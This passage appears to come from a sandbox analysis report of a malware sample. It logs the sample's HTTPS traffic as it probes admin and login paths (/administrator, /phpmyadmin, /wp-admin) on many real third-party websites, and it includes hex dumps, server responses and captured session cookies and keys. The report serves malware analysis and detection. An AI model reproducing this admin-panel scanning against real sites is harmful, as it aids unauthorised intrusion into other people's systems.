                                                                                                                                                                                                    Data Ascii: <link rel='stylesheet' id='theme-bootstrap-css' href='https://www.ceuandalucia.es/wp/wp-content/themes/envision/lib/css/bootstrap.css?ver=2.0.9.3' type='text/css' media='all' /><link rel='stylesheet' id='theme-child-frontend-style-css' href='https://ww
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC6INData Raw: 35 62 66 35 0d 0a
                                                                                                                                                                                                    Data Ascii: 5bf5


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    148192.168.2.45857413.32.208.274436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC492OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: www.perrisesd.org
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: SWSessionID=ba42e268-c765-4904-80e3-ade29c961f0f; AccountID=Xogon24LhVEF1Gfd40nUZQ==; APIKey=1bbe4818-f2c5-416c-a84a-2ce99b631f94; CSAN=zXOKKR3GedasH9m5g4E4RQ==; PSDB=lL7iN951F63+qccmbSPISkYpSYcXNAdZfwA6IkfZ1mg=; PSN=TYQOVZnyPCoiWL2kw/FH8w==
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.perrisesd.org/administrator/
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC674INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 36 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 0d 0a 53 65 72 76 65 72 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 49 49 53 2f 31 30 2e 30 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 44 6f 6d 61 69 6e
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Content-Length: 3067Connection: closeDate: Sun, 26 Nov 2023 05:59:34 GMTCache-Control: privateServer: Microsoft-IIS/10.0Strict-Transport-Security: max-age=31536000; includeSubDomain
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC3067INData Raw: 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 53 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 65 72 72 69 73 65 73 64 2e 6f 72 67 2f 53 74 61 74 69 63 2f 2f 73 69 74 65 2f 61 73 73 65 74 73 2f 53 74 79 6c 65 73 2f 73 79 73 74 65 6d 5f 32 37 34 31 2e 63 73 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                                                                                                                                                    Data Ascii: <html><head> <link rel="Stylesheet" type="text/css" href="https://www.perrisesd.org/Static//site/assets/Styles/system_2741.css" /> <title>Error 404 - Page Not Found</title> <style type="text/css"> @font-face { font


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    149192.168.2.45809135.164.64.2464436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC174OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: belongfbg.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC150INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 74 72 61 6e 73 66 65 72 2d 65 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not Founddate: Sun, 26 Nov 2023 05:59:34 GMTcontent-type: text/html; charset=UTF-8transfer-encoding: chunkedconnection: close
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1321INData Raw: 35 32 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 0a 68 74 6d 6c 2c 62 6f 64 79 7b 0a 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 7d 0a 0a
                                                                                                                                                                                                    Data Ascii: 522<!doctype html><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><style type="text/css">html,body{ width:100%; height:100%; margin:0; padding:0;}
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    150192.168.2.45811274.220.219.1894436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC222OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: himontessori.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://himontessori.com/wp-login.php
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC456INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 52 65 64 69 72 65 63 74 2d 42 79 3a 20 57 6f 72 64 50 72 65 73 73 0d 0a 55 70 67 72 61 64 65 3a 20 68 32 2c 68 32 63 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 55 70 67 72 61 64 65 2c 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 05:59:34 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Redirect-By: WordPressUpgrade: h2,h2cConnection: Upgrade, closeLocation: https://


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    151192.168.2.45820718.229.0.1714436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC158OUTGET / HTTP/1.1
                                                                                                                                                                                                    Host: rech.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC184INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 68 2e 63 6f 6d 2f 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyServer: nginxDate: Sun, 26 Nov 2023 05:59:34 GMTContent-Type: text/htmlContent-Length: 162Connection: closeLocation: https://www.rech.com/
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    152192.168.2.458173199.34.228.1774436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1352OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: gatewaytoearlylearning.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: PublishedSiteSession=eyJpdiI6IitSbkFTNmJDdjloOWhzTnFzTm9qZ1E9PSIsInZhbHVlIjoiaEFSQ29UbVZRQ29lczgrVDZYMGR4NDkyd1MwNkx2TG9kOUpoVEhxdUIzRSsydE50aGYxekF4RkRvNk1kaUh2c1hyYkVFalByeDJuOE9QckNwV21lMjVLTnY4cEV2TUtOZitzb1c0UVVLVWVCYTZ3NllZWmdiTXFYSlZyR0FhcHEiLCJtYWMiOiJhMjg5ZTNiNmRlMTdjMDllNTQzNTZjMmI5YTNhZmNhYzI4ZjExM2E0NTQ0ZDhiNGM4NjQ1Nzc0NDQ2MGViN2UyIiwidGFnIjoiIn0%3D; publishedsite-xsrf=eyJpdiI6IjNpSDA4TTd2dzFidW15T3J0Q1EwNEE9PSIsInZhbHVlIjoiTTRWK1RrOHAzeFRlbWNaSm15TU1yWmdObVBKYW9rQk43THM3ZzZRekFpQlNvM00yNkRvSTNBeEFDVlBkT3FvYUp1aTZrNEdub2Q4aE9NbHp2VmVGS2lRcUs5dC8rdE5USEtJMFZYdGNGRXJDU2tweUluS01ST3FTSnQ1ZWkxN3MiLCJtYWMiOiI1YTdkOGYwZDQ0ZjkwN2VkZjUxMThkMzI2MWE2YWJhOGNlMjUwYjdiZTE3OWYzMjQ5YjdhNDFhMTMyMmFhNjlhIiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6InN0bXgycFppajByVzJ5VVFma0l6Q1E9PSIsInZhbHVlIjoiMHpVODVyYnBYREhlaXpTQS9mOTZkUUVYdjFHcWh4bWhnMytScHBadC9hbkF3RktMbXVBNmwwYVN4ZWVtQldJS2pwWm9rU0U4d2lYbGd4ZEFLNEVlOW5Bc0E3WFRCUmMwMjBjUFB1RDJ0NnZqR1ZlWWQ0ckxUWStRaWZqR1c4bmkiLCJtYWMiOiI2OTU4OWFkZGVkMzU2N2I5ZGJlMGVhMWJmZmUxYzA0NjdlYjBlNDM1M2M2ZTcyNDczYzkwNTNkOTc1NzdhMGU3IiwidGFnIjoiIn0%3D
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://www.gatewaytoearlylearning.com/administrator
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1148INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 61 74 65 77 61 79 74 6f 65 61 72 6c 79 6c 65 61 72 6e 69 6e 67 2e 63 6f 6d 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 0d 0a 53 65 74 2d 43
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveDate: Sun, 26 Nov 2023 05:59:34 GMTLocation: https://www.gatewaytoearlylearning.com/administrator/index.phpSet-C
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC607INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 75 62 6c 69 73 68 65 64 53 69 74 65 53 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 68 61 53 6e 4a 75 53 45 39 77 52 30 4e 69 59 6d 56 6c 4d 6e 70 52 4d 6d 70 4a 51 33 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 65 44 46 45 4f 47 64 4b 59 6a 42 78 61 48 6b 72 5a 32 78 4e 61 6e 4a 46 57 46 68 59 4d 46 55 30 61 33 6c 54 52 54 5a 6b 56 30 5a 79 5a 57 74 78 65 56 5a 6a 62 46 59 7a 51 6c 52 53 52 33 70 6c 4e 54 5a 69 64 46 51 72 55 48 70 51 64 48 4d 32 62 32 35 76 63 45 74 70 4d 47 52 6c 64 31 68 72 55 33 4e 42 55 6c 52 55 4d 7a 4e 58 51 55 4a 5a 61 32 5a 30 61 79 73 35 65 47 52 4a 52 44 56 69 4f 46 4e 4c 5a 48 56 4f 56 48 68 32 53 6a 4a 45 4d 6c 4e 34 56 7a 4e 48 59 57 46 53 53 7a 68 50 53 56 42 72 59 7a
                                                                                                                                                                                                    Data Ascii: Set-Cookie: PublishedSiteSession=eyJpdiI6IkhaSnJuSE9wR0NiYmVlMnpRMmpJQ3c9PSIsInZhbHVlIjoieDFEOGdKYjBxaHkrZ2xNanJFWFhYMFU0a3lTRTZkV0ZyZWtxeVZjbFYzQlRSR3plNTZidFQrUHpQdHM2b25vcEtpMGRld1hrU3NBUlRUMzNXQUJZa2Z0ays5eGRJRDViOFNLZHVOVHh2SjJEMlN4VzNHYWFSSzhPSVBrYz
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC506INData Raw: 31 65 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 61 74 65 77 61 79 74 6f 65 61 72 6c 79 6c 65 61 72 6e 69 6e 67 2e 63 6f 6d 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 61 74 65 77 61 79 74 6f 65 61 72 6c 79 6c 65 61 72 6e 69 6e
                                                                                                                                                                                                    Data Ascii: 1ee<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://www.gatewaytoearlylearning.com/administrator/index.php'" /> <title>Redirecting to https://www.gatewaytoearlylearnin


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    153192.168.2.458661172.67.132.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC173OUTGET /phpmyadmin HTTP/1.1
                                                                                                                                                                                                    Host: esoft.academy
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC626INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cache, privateCF-Cache-Status: DYNAMICReport-To: {"endpoints":
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC743INData Raw: 37 64 33 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 77 69 6e 64 6f 77 2e 4e 52 45 55 4d 7c 7c 28 4e 52 45 55 4d 3d 7b 7d 29 29 2e 69 6e 69 74 3d 7b 61 6a 61 78 3a 7b 64 65 6e 79 5f 6c 69 73 74 3a 5b 22 62 61 6d 2e 65 75 30 31 2e 6e 72 2d 64 61 74 61 2e 6e 65 74 22 5d 7d 7d 3b 28 77 69 6e 64 6f 77 2e 4e 52 45 55 4d 7c 7c 28 4e 52 45 55 4d 3d 7b 7d 29 29 2e 6c 6f 61 64 65 72 5f 63 6f 6e 66 69 67 3d 7b 6c 69 63 65 6e 73 65 4b 65 79 3a 22 4e 52 4a 53 2d 38 39 33 62 34 33 36 63 64
                                                                                                                                                                                                    Data Ascii: 7d3d<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"><script type="text/javascript">(window.NREUM||(NREUM={})).init={ajax:{deny_list:["bam.eu01.nr-data.net"]}};(window.NREUM||(NREUM={})).loader_config={licenseKey:"NRJS-893b436cd
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1369INData Raw: 6f 64 75 63 74 3a 76 6f 69 64 20 30 2c 65 78 74 72 61 3a 76 6f 69 64 20 30 2c 6a 73 41 74 74 72 69 62 75 74 65 73 3a 7b 7d 2c 75 73 65 72 41 74 74 72 69 62 75 74 65 73 3a 76 6f 69 64 20 30 2c 61 74 74 73 3a 76 6f 69 64 20 30 2c 74 72 61 6e 73 61 63 74 69 6f 6e 4e 61 6d 65 3a 76 6f 69 64 20 30 2c 74 4e 61 6d 65 50 6c 61 69 6e 3a 76 6f 69 64 20 30 7d 2c 6f 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 69 6e 66 6f 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 29 3b 69 66 28 21 6f 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 49 6e 66 6f 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22
                                                                                                                                                                                                    Data Ascii: oduct:void 0,extra:void 0,jsAttributes:{},userAttributes:void 0,atts:void 0,transactionName:void 0,tNamePlain:void 0},o={};function s(e){if(!e)throw new Error("All info objects require an agent identifier!");if(!o[e])throw new Error("Info for ".concat(e,"
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1369INData Raw: 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 65 76 65 6e 74 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 74 69 6d 69 6e 67 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 6c 6f 6e 67 5f 74 61 73 6b 3a 21 31 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 73 65 73 73 69 6f 6e 5f 74 72 61 63 65 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 31 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 68 61 72 76 65 73 74 3a 7b 74 6f 6f 4d 61 6e 79 52 65 71 75 65 73 74 73 44 65 6c 61 79 3a 36 30 7d 2c 73 65 73 73 69 6f 6e 5f 72 65
                                                                                                                                                                                                    Data Ascii: TimeSeconds:30,autoStart:!0},page_view_event:{enabled:!0,autoStart:!0},page_view_timing:{enabled:!0,harvestTimeSeconds:30,long_task:!1,autoStart:!0},session_trace:{enabled:!0,harvestTimeSeconds:10,autoStart:!0},harvest:{tooManyRequestsDelay:60},session_re
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1369INData Raw: 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 67 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 67 5b 65 5d 3d 28 30 2c 69 2e 44 29 28 74 2c 66 28 29 29 3b 63 6f 6e 73 74 20 6e 3d 28 30 2c 72 2e 65 6b 29 28 65 29 3b 6e 26 26 28 6e 2e 69 6e 69 74 3d 67 5b 65 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 76 61 72 20 6e 3d 68 28 65 29 3b 69 66 28 6e 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 2e 73 70 6c 69 74 28 22 2e 22 29 2c
                                                                                                                                                                                                    Data Ascii: hrow new Error("Configuration for ".concat(e," was never set"));return g[e]}function v(e,t){if(!e)throw new Error(p);g[e]=(0,i.D)(t,f());const n=(0,r.ek)(e);n&&(n.init=g[e])}function m(e,t){if(!e)throw new Error(p);var n=h(e);if(n){for(var r=t.split("."),
